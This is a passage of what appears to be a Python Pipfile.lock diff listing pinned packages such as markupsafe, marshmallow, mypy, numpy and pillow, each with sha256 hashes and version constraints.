"sha256:5974895115737a74a00b321e339b9c3f45c20275d226398ae79ac008d908bff7", - "sha256:5ef87fca280fb15342726bd5f980f6faf8b84a5287fcc2d4962ea8af88b35130", - "sha256:603a464c2e67d8a546ddaa206d98e3246e5db05594b97db844c2f0a1af37cf5b", - "sha256:6653071f4f9bac46fbc30f3c7838b0e9063ee335908c5d61fb7a4a86c8fd2036", - "sha256:6ca2264f341dd81e41f3fffecec6e446aa2121e0b8d026fb5130e02de1402785", - "sha256:6d279033bf614953c3fc4a0aa9ac33a21e8044ca72d4fa8b9273fe75359d5cca", - "sha256:6d949f53ad4fc7cf02c44d6678e7ff05ec5f5552b235b9e136bd52e9bf730b91", - "sha256:6daa662aba22ef3258934105be2dd9afa5bb45748f4f702a3b39a5bf53a1f4dc", - "sha256:6eafc048ea3f1b3c136c71a86db393be36b5b3d9c87b1c25204e7d397cee9536", - "sha256:830c88747dce8a3e7525defa68afd742b4580df6aa2fdd6f0855481e3994d391", - "sha256:86e92728ef3fc842c50a5cb1d5ba2bc66db7da08a7af53fb3da79e202d1b2cd3", - "sha256:8caf4d16b31961e964c62194ea3e26a0e9561cdf72eecb1781458b67ec83423d", - "sha256:8d1a92d8e90b286d491e5626af53afef2ba04da33e82e30744795c71880eaa21", - "sha256:8f0a4d179c9a941eb80c3a63cdb495e539e064f8054230844dcf2fcb812b71d3", - "sha256:9232b09f5efee6a495a99ae6824881940d6447debe272ea400c02e3b68aad85d", - "sha256:927a9dd016d6033bc12e0bf5dee1dde140235fc8d0d51099353c76081c03dc29", - "sha256:93e414e3206779ef41e5ff2448067213febf260ba747fc65389a3ddaa3fb8715", - "sha256:98cafc618614d72b02185ac583c6f7796202062c41d2eeecdf07820bad3295ed", - "sha256:9c3a88d20e4fe4a2a4a84bf439a5ac9c9aba400b85244c63a1ab7088f85d9d25", - "sha256:9f36de4cd0c262dd9927886cc2305aa3f2210db437aa4fed3fb4940b8bf4592c", - "sha256:a60f90bba4c37962cbf210f0188ecca87daafdf60271f4c6948606e4dabf8785", - "sha256:a614e4afed58c14254e67862456d212c4dcceebab2eaa44d627c2ca04bf86837", - "sha256:ae06c1e4bc60ee076292e582a7512f304abdf6c70db59b56745cca1684f875a4", - "sha256:b122a188cd292c4d2fcd78d04f863b789ef43aa129b233d7c9004de08693728b", - "sha256:b570da8cd0012f4af9fa76a5635cd31f707473e65a5a335b186069d5c7121ff2", - "sha256:bcaa1c495ce623966d9fc8a187da80082334236a2a1c7e141763ffaf7a405067", - "sha256:bd34f6d1810d9354dc7e35158aa6cc33456be7706df4420819af6ed966e85448", - "sha256:be9eb06489bc975c38706902cbc6888f39e946b81383abc2838d186f0e8b6a9d", - "sha256:c4b2e0559b68455c085fb0f6178e9752c4be3bba104d6e881eb5573b399d1eb2", - "sha256:c62e8dd9754b7debda0c5ba59d34509c4688f853588d75b53c3791983faa96fc", - "sha256:c852b1530083a620cb0de5f3cd6826f19862bafeaf77586f1aef326e49d95f0c", - "sha256:d9fc0bf3ff86c17348dfc5d322f627d78273eba545db865c3cd14b3f19e57fa5", - "sha256:dad7b164905d3e534883281c050180afcf1e230c3d4a54e8038aa5cfcf312b84", - "sha256:e5f66bdf0976ec667fc4594d2812a00b07ed14d1b44259d19a41ae3fff99f2b8", - "sha256:e8f0c9d65da595cfe91713bc1222af9ecabd37971762cb830dea2fc3b3bb2acf", - "sha256:edffbe3c510d8f4bf8640e02ca019e48a9b72357318383ca60e3330c23aaffc7", - "sha256:eea5d6443b093e1545ad0210e6cf27f920482bfcf5c77cdc8596aec73523bb7e", - "sha256:ef72013e20dd5ba86a8ae1aed7f56f31d3374189aa8b433e7b12ad182c0d2dfb", - "sha256:f05251bbc2145349b8d0b77c0d4e5f3b228418807b1ee27cefb11f69ed3d233b", - "sha256:f1be258c4d3dc609e654a1dc59d37b17d7fef05df912c01fc2e15eb43a9735f3", - "sha256:f9ced82717c7ec65a67667bb05865ffe38af0e835cdd78728f1209c8fffe0cad", - "sha256:fe17d10b97fdf58155f858606bddb4e037b805a60ae023c009f760d8361a4eb8", - "sha256:fe749b052bb7233fe5d072fcb549221a8cb1a16725c47c37e42b0b9cb3ff2c3f" - ], - "index": "pypi", - "version": "==4.9.1" - }, - "marisa-trie": { - "hashes": [ - "sha256:00a8f62a6b371ec0a947f49cd960a9dee3ac43eb0c8cce7a4b2736bc20cb6c3d", - "sha256:0ac90d35eec78368f8ec42c45ab9f6ab0ccbd30ddf5e63f801cc62f03839b16b", - "sha256:0e00da36b5297f644e65764252496f3b3aa7f95a7cb53e19ee2354054b759dbb", - "sha256:14536de51294752ef490a470240b83677486a42eb5e3bc97d0bfca4c20b2babb", - "sha256:1a5a51f7d4d8b4e603d5fed992a1e8ab5212291bb20d25d0020b90cb4562da53", - "sha256:1b704487470c9e1f08e31572633e11d25ada0628ec3ebfd28b110aeb62cc2233", - "sha256:2ad8eb6f48167291eb81b95f25f80b9ea02d168951e4df17499fc3c34e9c3f36", - "sha256:31661a8d2094eeb8341cb660b53c33e4828032582dce3895db09567e48de2c52", - "sha256:3421c117b66275b91f6fa07f732a788cce0e2bfa00d312d83516b0155cf72462", - "sha256:346cd9b0bf40385f8aee008d8c4962206962184673aea1631ee51b081c676250", - "sha256:35d0af53db6961c65d655248399cec893071eb5ae2cf06e6571f2fbea038a6d1", - "sha256:3bb9fbf2d10696fc4706984ebbd1bbb09724ab9f16758ec4ce344bbf50326302", - "sha256:3d019d17b0d7f62d6e6d7bd05236d8252624ea1c140beb8bf9c6eeff38b3c707", - "sha256:3fb5fa90aa5fdffa6b9f1ea33d54d683682b53277642cef27bbc2e9ecc9a1c9f", - "sha256:4dfea1c84d8862368b7bda2480b28f0bb465dae7efd9a7ca94b2dfce62648028", - "sha256:571ead866d0b9a70eb016a0b0b5a8c9ec357a92447b63fdd30a497cea4a1945a", - "sha256:5f97883f89e649b47ad22f6ca55a5931986c103a4c52e121101db28cebb9e5f7", - "sha256:615a33ed4f28d6734a71d9fbae836420cfd2e64d5e0d948f00fb7d4c5fe1aed0", - "sha256:68451447d201b8951efa141ca038b5cd2bebd7ad875dba3e5b325ec19f9b04ea", - "sha256:6c13fbd44c9e40eaa380845a9baa64a1fd123bc0de8cbd6e13e8fc11675c3f79", - "sha256:6cf376b51d7a199450d075883d516dc4d134aec6f62ae3afdf224c4c10131464", - "sha256:713644ac3e7ef17adee5eeeb30fcd1bf86de14aa319fe1fe8e7dfad2505dc38a", - "sha256:75889b3dbe544f02d8e55ef4355f39df63643f83fc239ab5651c0356a2b82cc1", - "sha256:77537883f3b73a4d8e3c2d3af04360516af7c4b96271de5d45532eb86fef9356", - "sha256:852d062c863ddc0795196bd30ebb9945b462febc782f12e3316429a58182bfe3", - "sha256:87f2158bd88539a1ce99246aff4a544e0bf244637ff6d5e780befc7fb97c6e29", - "sha256:8e4ef47d20fe2a3b4c36c4ec88334d4661cadef4cda785de2386c4a1a9be9e0d", - "sha256:936878a6c14551c83d17fac6cc7c8fa0a41745f96dd75d3fbc0a90859bbbb2f6", - "sha256:93af5a92405be7f56a226ba6169e32e56c31f6ea58270fa7156ae99adc314ae8", - "sha256:96aef02119b70f37c59a289cb0f7293547780dfe60ba302140f6083518cec9b9", - "sha256:990929e8ba36b650d95d600113896b57525b33000a13dc2be06018abb005b47e", - "sha256:99c2b536641dfb44d790eb4349e08ceb61e8c2876e376bc063013e5ecbb39619", - "sha256:9e80a28bc6de8e6ba3449df55ff3c42ca9fd511ec829dd7774a0f1320f4a888b", - "sha256:9f8d25da9a93ebab0d72eaecf8683fe916e08b8029979d3c3fd9aca60da426a8", - "sha256:9fc453083768b666098f200ad2761d0b17b79c8de2d405748db342cb0529408d", - "sha256:a708cbae3b502fdcb39cc25f2e5079026de1a4814c234c34d13e216967951b28", - "sha256:a74751c141f42b14a430d82f46e1523f73b1b73d7d90de6b0f0a7e22dd75976d", - "sha256:aa63bcf05c3f4dfc0312b3c0c0ea84aed47d59ef4d99b3eeaa718ff938a75cbd", - "sha256:b11adc952efb0ba3d23f3cb98aec58b369f308f48de12f7bb207ca288e304c1d", - "sha256:b804e25a36823a806ae3072214acea389bfa46cd46dc176450fb073f5f2c688b", - "sha256:b9db0b0a659d80b2c2b19601984c093dafa484698311d96a2da34b4cbe887ec1", - "sha256:bb91907fb1c5450819f9e844a1a5f1f81e27fc502e41ba7836842f4b56d04e04", - "sha256:bdcffb4d5707ba02824989de120eac137c49639e67254e5d68d8a874e1153922", - "sha256:cb5efa71bba63edbe5207394eb1652cf5b51018a40fd327614246078f5dec48a", - "sha256:cd14bb68d35c1aeb9923bc38040597883f11e79418a7ddeee6c3a54a53f5476d", - "sha256:d2c20cb7ddf3c145bac0c7bf5c1bcf006054b7604a81487113971b44622cad5c", - "sha256:d305c7ffc912a806fcfcae70afd8dd3c6f915b453a611b70e0e768a8a793d296", - "sha256:d434f4ebd69061f975b7d4f0af9951fccd9c91997bef4e7e9c77720e26f93f56", - "sha256:d4dbb091121e3bd48d8353c8a7885332907a5526286829c7db948da665fafcf9", - "sha256:dc6549c1a7bf743b3da992e2527a71a3251097cf451733c6d3038b03a96f6dcc", - "sha256:dea191db66c122db0660ae127ea6c8f4462886ad9b7525757097a87ee941c4ae", - "sha256:e54ae0a9e7c4623252e3e4bede110a250ad017dc491303e9aa00e10c7a7c14cc", - "sha256:e6486c924a6e2bb58d2b6320932ae7d3b59b54e39b40b16fb41875c20eeb13fe", - "sha256:e6db758035d119172dd9f6315c8038124d2c15e96bd1698b999cd2d5f020b7ce", - "sha256:e7e7ca4338075275a0bd34f99a979dfbdafab4aefe212a9d1e6c3790e56d7c0a", - "sha256:eae0ce778d781c952e6c954b62719fde3251560232151c322d7f06b129d0a7fd", - "sha256:ed65ffd42a28db0f4bae8618e2eac32ccd00068d39abecd7cf4ffc8dc6488295", - "sha256:ef9c087471141a6f10f903355e7b0fa6d98e097c02453241d9949892b47e5cac", - "sha256:f157abd020dfbdd32ab3aa7bda3a6f65b3007f2e3f793313bebd0d6114a39647", - "sha256:f15bde9dc8e1dc7168f696fc49ab3e02c9aa16dde1d9798edf4a942fab1a3009", - "sha256:f25db06c59b66cef1b6d777438096b43acfc463ed9741318f7befd98a22801cd", - "sha256:f80589720dac6a9191a9025c3ecbf271445d0f5c2b78ba881573f0e9ebf48003", - "sha256:fb76cbb76a10231b6e7366a31a7eecfc742d32f8988ded0b5ae8b325c49ef103" - ], - "index": "pypi", - "version": "==0.8.0" - }, - "markuppy": { - "hashes": [ - "sha256:1adee2c0a542af378fe84548ff6f6b0168f3cb7f426b46961038a2bcfaad0d5f" - ], - "version": "==1.14" - }, - "markupsafe": { - "hashes": [ - "sha256:05fb21170423db021895e1ea1e1f3ab3adb85d1c2333cbc2310f2a26bc77272e", - "sha256:0a4e4a1aff6c7ac4cd55792abf96c915634c2b97e3cc1c7129578aa68ebd754e", - "sha256:10bbfe99883db80bdbaff2dcf681dfc6533a614f700da1287707e8a5d78a8431", - "sha256:134da1eca9ec0ae528110ccc9e48041e0828d79f24121a1a146161103c76e686", - "sha256:1577735524cdad32f9f694208aa75e422adba74f1baee7551620e43a3141f559", - "sha256:1b40069d487e7edb2676d3fbdb2b0829ffa2cd63a2ec26c4938b2d34391b4ecc", - "sha256:282c2cb35b5b673bbcadb33a585408104df04f14b2d9b01d4c345a3b92861c2c", - "sha256:2c1b19b3aaacc6e57b7e25710ff571c24d6c3613a45e905b1fde04d691b98ee0", - "sha256:2ef12179d3a291be237280175b542c07a36e7f60718296278d8593d21ca937d4", - "sha256:338ae27d6b8745585f87218a3f23f1512dbf52c26c28e322dbe54bcede54ccb9", - "sha256:3c0fae6c3be832a0a0473ac912810b2877c8cb9d76ca48de1ed31e1c68386575", - "sha256:3fd4abcb888d15a94f32b75d8fd18ee162ca0c064f35b11134be77050296d6ba", - "sha256:42de32b22b6b804f42c5d98be4f7e5e977ecdd9ee9b660fda1a3edf03b11792d", - "sha256:504b320cd4b7eff6f968eddf81127112db685e81f7e36e75f9f84f0df46041c3", - "sha256:525808b8019e36eb524b8c68acdd63a37e75714eac50e988180b169d64480a00", - "sha256:56d9f2ecac662ca1611d183feb03a3fa4406469dafe241673d521dd5ae92a155", - "sha256:5bbe06f8eeafd38e5d0a4894ffec89378b6c6a625ff57e3028921f8ff59318ac", - "sha256:65c1a9bcdadc6c28eecee2c119465aebff8f7a584dd719facdd9e825ec61ab52", - "sha256:68e78619a61ecf91e76aa3e6e8e33fc4894a2bebe93410754bd28fce0a8a4f9f", - "sha256:69c0f17e9f5a7afdf2cc9fb2d1ce6aabdb3bafb7f38017c0b77862bcec2bbad8", - "sha256:6b2b56950d93e41f33b4223ead100ea0fe11f8e6ee5f641eb753ce4b77a7042b", - "sha256:787003c0ddb00500e49a10f2844fac87aa6ce977b90b0feaaf9de23c22508b24", - "sha256:7ef3cb2ebbf91e330e3bb937efada0edd9003683db6b57bb108c4001f37a02ea", - "sha256:8023faf4e01efadfa183e863fefde0046de576c6f14659e8782065bcece22198", - "sha256:8758846a7e80910096950b67071243da3e5a20ed2546e6392603c096778d48e0", - "sha256:8afafd99945ead6e075b973fefa56379c5b5c53fd8937dad92c662da5d8fd5ee", - "sha256:8c41976a29d078bb235fea9b2ecd3da465df42a562910f9022f1a03107bd02be", - "sha256:8e254ae696c88d98da6555f5ace2279cf7cd5b3f52be2b5cf97feafe883b58d2", - "sha256:9402b03f1a1b4dc4c19845e5c749e3ab82d5078d16a2a4c2cd2df62d57bb0707", - "sha256:962f82a3086483f5e5f64dbad880d31038b698494799b097bc59c2edf392fce6", - "sha256:9dcdfd0eaf283af041973bff14a2e143b8bd64e069f4c383416ecd79a81aab58", - "sha256:aa7bd130efab1c280bed0f45501b7c8795f9fdbeb02e965371bbef3523627779", - "sha256:ab4a0df41e7c16a1392727727e7998a467472d0ad65f3ad5e6e765015df08636", - "sha256:ad9e82fb8f09ade1c3e1b996a6337afac2b8b9e365f926f5a61aacc71adc5b3c", - "sha256:af598ed32d6ae86f1b747b82783958b1a4ab8f617b06fe68795c7f026abbdcad", - "sha256:b076b6226fb84157e3f7c971a47ff3a679d837cf338547532ab866c57930dbee", - "sha256:b7ff0f54cb4ff66dd38bebd335a38e2c22c41a8ee45aa608efc890ac3e3931bc", - "sha256:bfce63a9e7834b12b87c64d6b155fdd9b3b96191b6bd334bf37db7ff1fe457f2", - "sha256:c011a4149cfbcf9f03994ec2edffcb8b1dc2d2aede7ca243746df97a5d41ce48", - "sha256:c9c804664ebe8f83a211cace637506669e7890fec1b4195b505c214e50dd4eb7", - "sha256:ca379055a47383d02a5400cb0d110cef0a776fc644cda797db0c5696cfd7e18e", - "sha256:cb0932dc158471523c9637e807d9bfb93e06a95cbf010f1a38b98623b929ef2b", - "sha256:cd0f502fe016460680cd20aaa5a76d241d6f35a1c3350c474bac1273803893fa", - "sha256:ceb01949af7121f9fc39f7d27f91be8546f3fb112c608bc4029aef0bab86a2a5", - "sha256:d080e0a5eb2529460b30190fcfcc4199bd7f827663f858a226a81bc27beaa97e", - "sha256:dd15ff04ffd7e05ffcb7fe79f1b98041b8ea30ae9234aed2a9168b5797c3effb", - "sha256:df0be2b576a7abbf737b1575f048c23fb1d769f267ec4358296f31c2479db8f9", - "sha256:e09031c87a1e51556fdcb46e5bd4f59dfb743061cf93c4d6831bf894f125eb57", - "sha256:e4dd52d80b8c83fdce44e12478ad2e85c64ea965e75d66dbeafb0a3e77308fcc", - "sha256:fec21693218efe39aa7f8599346e90c705afa52c5b31ae019b2e57e8f6542bb2" - ], - "markers": "python_version >= '3.7'", - "version": "==2.1.3" - }, - "marshmallow": { - "hashes": [ - "sha256:5d2371bbe42000f2b3fb5eaa065224df7d8f8597bc19a1bbfa5bfe7fba8da889", - "sha256:684939db93e80ad3561392f47be0230743131560a41c5110684c16e21ade0a5c" - ], - "markers": "python_version >= '3.8'", - "version": "==3.20.1" - }, - "marshmallow-enum": { - "hashes": [ - "sha256:38e697e11f45a8e64b4a1e664000897c659b60aa57bfa18d44e226a9920b6e58", - "sha256:57161ab3dbfde4f57adeb12090f39592e992b9c86d206d02f6bd03ebec60f072" - ], - "version": "==1.5.1" - }, - "mock": { - "hashes": [ - "sha256:18c694e5ae8a208cdb3d2c20a993ca1a7b0efa258c247a1e565150f477f83744", - "sha256:5e96aad5ccda4718e0a229ed94b2024df75cc2d55575ba5762d31f5767b8767d" - ], - "markers": "python_version >= '3.6'", - "version": "==5.1.0" - }, - "model-bakery": { - "hashes": [ - "sha256:0f54a4548722ecee0183d82eabe1adf8f74303e6ce08705cfe228a96ef3bb7d9", - "sha256:dba7444c9593261b12dcb21f8f9e1ba668fafc70804f15dfd6aa208b9e3f558f" - ], - "markers": "python_version >= '3.7'", - "version": "==1.13.0" - }, - "mypy": { - "hashes": [ - "sha256:0af4f0e20706aadf4e6f8f8dc5ab739089146b83fd53cb4a7e0e850ef3de0bb6", - "sha256:15b5a824b58c7c822c51bc66308e759243c32631896743f030daf449fe3677f3", - "sha256:17455cda53eeee0a4adb6371a21dd3dbf465897de82843751cf822605d152c8c", - "sha256:2013226d17f20468f34feddd6aae4635a55f79626549099354ce641bc7d40262", - "sha256:24189f23dc66f83b839bd1cce2dfc356020dfc9a8bae03978477b15be61b062e", - "sha256:27a0f74a298769d9fdc8498fcb4f2beb86f0564bcdb1a37b58cbbe78e55cf8c0", - "sha256:28cea5a6392bb43d266782983b5a4216c25544cd7d80be681a155ddcdafd152d", - "sha256:448de661536d270ce04f2d7dddaa49b2fdba6e3bd8a83212164d4174ff43aa65", - "sha256:48525aec92b47baed9b3380371ab8ab6e63a5aab317347dfe9e55e02aaad22e8", - "sha256:5bc8d6bd3b274dd3846597855d96d38d947aedba18776aa998a8d46fabdaed76", - "sha256:5deb252fd42a77add936b463033a59b8e48eb2eaec2976d76b6878d031933fe4", - "sha256:5f546ac34093c6ce33f6278f7c88f0f147a4849386d3bf3ae193702f4fe31407", - "sha256:5fdd63e4f50e3538617887e9aee91855368d9fc1dea30da743837b0df7373bc4", - "sha256:65b122a993d9c81ea0bfde7689b3365318a88bde952e4dfa1b3a8b4ac05d168b", - "sha256:71a808334d3f41ef011faa5a5cd8153606df5fc0b56de5b2e89566c8093a0c9a", - "sha256:920169f0184215eef19294fa86ea49ffd4635dedfdea2b57e45cb4ee85d5ccaf", - "sha256:93a85495fb13dc484251b4c1fd7a5ac370cd0d812bbfc3b39c1bafefe95275d5", - "sha256:a2948c40a7dd46c1c33765718936669dc1f628f134013b02ff5ac6c7ef6942bf", - "sha256:c6c2ccb7af7154673c591189c3687b013122c5a891bb5651eca3db8e6c6c55bd", - "sha256:c96b8a0c019fe29040d520d9257d8c8f122a7343a8307bf8d6d4a43f5c5bfcc8", - "sha256:d42a98e76070a365a1d1c220fcac8aa4ada12ae0db679cb4d910fabefc88b994", - "sha256:dbeb24514c4acbc78d205f85dd0e800f34062efcc1f4a4857c57e4b4b8712bff", - "sha256:e60d0b09f62ae97a94605c3f73fd952395286cf3e3b9e7b97f60b01ddfbbda88", - "sha256:e64f48c6176e243ad015e995de05af7f22bbe370dbb5b32bd6988438ec873919", - "sha256:e831662208055b006eef68392a768ff83596035ffd6d846786578ba1714ba8f6", - "sha256:eda5c8b9949ed411ff752b9a01adda31afe7eae1e53e946dbdf9db23865e66c4" - ], - "index": "pypi", - "version": "==1.0.1" - }, - "mypy-extensions": { - "hashes": [ - "sha256:4392f6c0eb8a5668a69e23d168ffa70f0be9ccfd32b5cc2d26a34ae5b844552d", - "sha256:75dbf8955dc00442a438fc4d0666508a9a97b6bd41aa2f0ffe9d2f2725af0782" - ], - "markers": "python_version >= '3.5'", - "version": "==1.0.0" - }, - "mysqlclient": { - "hashes": [ - "sha256:004fe1d30d2c2ff8072f8ea513bcec235fd9b896f70dad369461d0ad7e570e98", - "sha256:04368445f9c487d8abb7a878e3d23e923e6072c04a6c320f9e0dc8a82efba14e", - "sha256:530ece9995a36cadb6211b9787f0c9e05cdab6702549bdb4236af5e9b535ed6a", - "sha256:5670679ff1be1cc3fef0fa81bf39f0cd70605ba121141050f02743eb878ac114", - "sha256:68837b6bb23170acffb43ae411e47533a560b6360c06dac39aa55700972c93b2", - "sha256:955dba905a7443ce4788c63fdb9f8d688316260cf60b20ff51ac3b1c77616ede", - "sha256:9c6b142836c7dba4f723bf9c93cc46b6e5081d65b2af807f400dda9eb85a16d0" - ], - "index": "pypi", - "version": "==2.2.0" - }, - "networkit": { - "hashes": [ - "sha256:0ff615156110510c3c44d538baf6f48caf06af0e0b9fe4e4e3a1c527d54598b7", - "sha256:1b223201f63d0f282af75ff44710d476b414c6229ad767b6ca9242c9d25f0abb", - "sha256:29a31a1ad709f802d113907ee47f481dee713b0a72ebe44fb0930e3a92be6536", - "sha256:34e42a1a6836149265478bb0a70e75382487188e29632811ee894e231fe25788", - "sha256:36caba5c75bec9dab52a2fc98b6f24ebf89ad061256051645d73c71d88c1fd92", - "sha256:45863a9a1d554266112cfda895c5bfc0b9c74a80ffbb1b4bfb9fbf5d03533bd6", - "sha256:5b56564385fd4b749f34a2745c06b06378e124c46082342bbe9dbf1a73c9d76e", - "sha256:67b71732595ee1f192d1ffa93420087ce0fef63bd59cf0c3484e30847c997044", - "sha256:842781097d8d6ee9db2d847d9d7de958e36cf3d4c20bf84db7ae63cae12d7479", - "sha256:85071cd39692e93b3882dfae642a71421d4f74bc40ecede3877272c945e4bbee", - "sha256:9282d27edef5d9376b3016c047829d696ced67566b76f79679940687f27aaaab", - "sha256:98acc4c94b19353ccb074e689dea91272e877c4fd6b60c69ee8869433f14a76c", - "sha256:ae4e85900c2eb682ebef31b6bed3c645946394c4490318d10a3c01ed12d46bdc", - "sha256:b0cd7134c37aaf0c4c1ab489a0bdd8cb53d369c37a2b8469c6ce8be0f270faa4", - "sha256:bbb523c1e00aa90e35fd29585c55ee2a2c58016e2764e2249b8ae218e0678fae", - "sha256:bd0b62b1fcd656a8d33ab677aea4e14af1a8b53b235a2316c88f7ee79e6da784" - ], - "index": "pypi", - "version": "==10.1" - }, - "numpy": { - "hashes": [ - "sha256:0d60fbae8e0019865fc4784745814cff1c421df5afee233db6d88ab4f14655a2", - "sha256:1a1329e26f46230bf77b02cc19e900db9b52f398d6722ca853349a782d4cff55", - "sha256:1b9735c27cea5d995496f46a8b1cd7b408b3f34b6d50459d9ac8fe3a20cc17bf", - "sha256:2792d23d62ec51e50ce4d4b7d73de8f67a2fd3ea710dcbc8563a51a03fb07b01", - "sha256:3e0746410e73384e70d286f93abf2520035250aad8c5714240b0492a7302fdca", - "sha256:4c3abc71e8b6edba80a01a52e66d83c5d14433cbcd26a40c329ec7ed09f37901", - "sha256:5883c06bb92f2e6c8181df7b39971a5fb436288db58b5a1c3967702d4278691d", - "sha256:5c97325a0ba6f9d041feb9390924614b60b99209a71a69c876f71052521d42a4", - "sha256:60e7f0f7f6d0eee8364b9a6304c2845b9c491ac706048c7e8cf47b83123b8dbf", - "sha256:76b4115d42a7dfc5d485d358728cdd8719be33cc5ec6ec08632a5d6fca2ed380", - "sha256:7dc869c0c75988e1c693d0e2d5b26034644399dd929bc049db55395b1379e044", - "sha256:834b386f2b8210dca38c71a6e0f4fd6922f7d3fcff935dbe3a570945acb1b545", - "sha256:8b77775f4b7df768967a7c8b3567e309f617dd5e99aeb886fa14dc1a0791141f", - "sha256:90319e4f002795ccfc9050110bbbaa16c944b1c37c0baeea43c5fb881693ae1f", - "sha256:b79e513d7aac42ae918db3ad1341a015488530d0bb2a6abcbdd10a3a829ccfd3", - "sha256:bb33d5a1cf360304754913a350edda36d5b8c5331a8237268c48f91253c3a364", - "sha256:bec1e7213c7cb00d67093247f8c4db156fd03075f49876957dca4711306d39c9", - "sha256:c5462d19336db4560041517dbb7759c21d181a67cb01b36ca109b2ae37d32418", - "sha256:c5652ea24d33585ea39eb6a6a15dac87a1206a692719ff45d53c5282e66d4a8f", - "sha256:d7806500e4f5bdd04095e849265e55de20d8cc4b661b038957354327f6d9b295", - "sha256:db3ccc4e37a6873045580d413fe79b68e47a681af8db2e046f1dacfa11f86eb3", - "sha256:dfe4a913e29b418d096e696ddd422d8a5d13ffba4ea91f9f60440a3b759b0187", - "sha256:eb942bfb6f84df5ce05dbf4b46673ffed0d3da59f13635ea9b926af3deb76926", - "sha256:f08f2e037bba04e707eebf4bc934f1972a315c883a9e0ebfa8a7756eabf9e357", - "sha256:fd608e19c8d7c55021dffd43bfe5492fab8cc105cc8986f813f8c3c048b38760" - ], - "markers": "python_version >= '3.9'", - "version": "==1.25.2" - }, - "odfpy": { - "hashes": [ - "sha256:db766a6e59c5103212f3cc92ec8dd50a0f3a02790233ed0b52148b70d3c438ec", - "sha256:fc3b8d1bc098eba4a0fda865a76d9d1e577c4ceec771426bcb169a82c5e9dfe0" - ], - "version": "==1.4.1" - }, - "openpyxl": { - "hashes": [ - "sha256:40f568b9829bf9e446acfffce30250ac1fa39035124d55fc024025c41481c90f", - "sha256:8f3b11bd896a95468a4ab162fc4fcd260d46157155d1f8bfaabb99d88cfcf79f" - ], - "index": "pypi", - "version": "==3.0.9" - }, - "oss2": { - "hashes": [ - "sha256:8548ea7d43326f6fd679bc8b79b3a2dfbfe9c6a60ed57e2410818fec57023dda" - ], - "index": "pypi", - "version": "==2.13.1" - }, - "packaging": { - "hashes": [ - "sha256:dd47c42927d89ab911e606518907cc2d3a1f38bbd026385970643f9c5b8ecfeb", - "sha256:ef103e05f519cdc783ae24ea4e2e0f508a9c99b2d4969652eed6a2e1ea5bd522" - ], - "index": "pypi", - "version": "==21.3" - }, - "pep8": { - "hashes": [ - "sha256:b22cfae5db09833bb9bd7c8463b53e1a9c9b39f12e304a8d0bba729c501827ee", - "sha256:fe249b52e20498e59e0b5c5256aa52ee99fc295b26ec9eaa85776ffdb9fe6374" - ], - "index": "pypi", - "version": "==1.7.1" - }, - "pillow": { - "hashes": [ - "sha256:03150abd92771742d4a8cd6f2fa6246d847dcd2e332a18d0c15cc75bf6703040", - "sha256:073adb2ae23431d3b9bcbcff3fe698b62ed47211d0716b067385538a1b0f28b8", - "sha256:0b07fffc13f474264c336298d1b4ce01d9c5a011415b79d4ee5527bb69ae6f65", - "sha256:0b7257127d646ff8676ec8a15520013a698d1fdc48bc2a79ba4e53df792526f2", - "sha256:12ce4932caf2ddf3e41d17fc9c02d67126935a44b86df6a206cf0d7161548627", - "sha256:15c42fb9dea42465dfd902fb0ecf584b8848ceb28b41ee2b58f866411be33f07", - "sha256:18498994b29e1cf86d505edcb7edbe814d133d2232d256db8c7a8ceb34d18cef", - "sha256:1c7c8ae3864846fc95f4611c78129301e203aaa2af813b703c55d10cc1628535", - "sha256:22b012ea2d065fd163ca096f4e37e47cd8b59cf4b0fd47bfca6abb93df70b34c", - "sha256:276a5ca930c913f714e372b2591a22c4bd3b81a418c0f6635ba832daec1cbcfc", - "sha256:2e0918e03aa0c72ea56edbb00d4d664294815aa11291a11504a377ea018330d3", - "sha256:3033fbe1feb1b59394615a1cafaee85e49d01b51d54de0cbf6aa8e64182518a1", - "sha256:3168434d303babf495d4ba58fc22d6604f6e2afb97adc6a423e917dab828939c", - "sha256:32a44128c4bdca7f31de5be641187367fe2a450ad83b833ef78910397db491aa", - "sha256:3dd6caf940756101205dffc5367babf288a30043d35f80936f9bfb37f8355b32", - "sha256:40e1ce476a7804b0fb74bcfa80b0a2206ea6a882938eaba917f7a0f004b42502", - "sha256:41e0051336807468be450d52b8edd12ac60bebaa97fe10c8b660f116e50b30e4", - "sha256:4390e9ce199fc1951fcfa65795f239a8a4944117b5935a9317fb320e7767b40f", - "sha256:502526a2cbfa431d9fc2a079bdd9061a2397b842bb6bc4239bb176da00993812", - "sha256:51e0e543a33ed92db9f5ef69a0356e0b1a7a6b6a71b80df99f1d181ae5875636", - "sha256:57751894f6618fd4308ed8e0c36c333e2f5469744c34729a27532b3db106ee20", - "sha256:5d77adcd56a42d00cc1be30843d3426aa4e660cab4a61021dc84467123f7a00c", - "sha256:655a83b0058ba47c7c52e4e2df5ecf484c1b0b0349805896dd350cbc416bdd91", - "sha256:68943d632f1f9e3dce98908e873b3a090f6cba1cbb1b892a9e8d97c938871fbe", - "sha256:6c738585d7a9961d8c2821a1eb3dcb978d14e238be3d70f0a706f7fa9316946b", - "sha256:73bd195e43f3fadecfc50c682f5055ec32ee2c933243cafbfdec69ab1aa87cad", - "sha256:772a91fc0e03eaf922c63badeca75e91baa80fe2f5f87bdaed4280662aad25c9", - "sha256:77ec3e7be99629898c9a6d24a09de089fa5356ee408cdffffe62d67bb75fdd72", - "sha256:7db8b751ad307d7cf238f02101e8e36a128a6cb199326e867d1398067381bff4", - "sha256:801ec82e4188e935c7f5e22e006d01611d6b41661bba9fe45b60e7ac1a8f84de", - "sha256:82409ffe29d70fd733ff3c1025a602abb3e67405d41b9403b00b01debc4c9a29", - "sha256:828989c45c245518065a110434246c44a56a8b2b2f6347d1409c787e6e4651ee", - "sha256:829f97c8e258593b9daa80638aee3789b7df9da5cf1336035016d76f03b8860c", - "sha256:871b72c3643e516db4ecf20efe735deb27fe30ca17800e661d769faab45a18d7", - "sha256:89dca0ce00a2b49024df6325925555d406b14aa3efc2f752dbb5940c52c56b11", - "sha256:90fb88843d3902fe7c9586d439d1e8c05258f41da473952aa8b328d8b907498c", - "sha256:97aabc5c50312afa5e0a2b07c17d4ac5e865b250986f8afe2b02d772567a380c", - "sha256:9aaa107275d8527e9d6e7670b64aabaaa36e5b6bd71a1015ddd21da0d4e06448", - "sha256:9f47eabcd2ded7698106b05c2c338672d16a6f2a485e74481f524e2a23c2794b", - "sha256:a0a06a052c5f37b4ed81c613a455a81f9a3a69429b4fd7bb913c3fa98abefc20", - 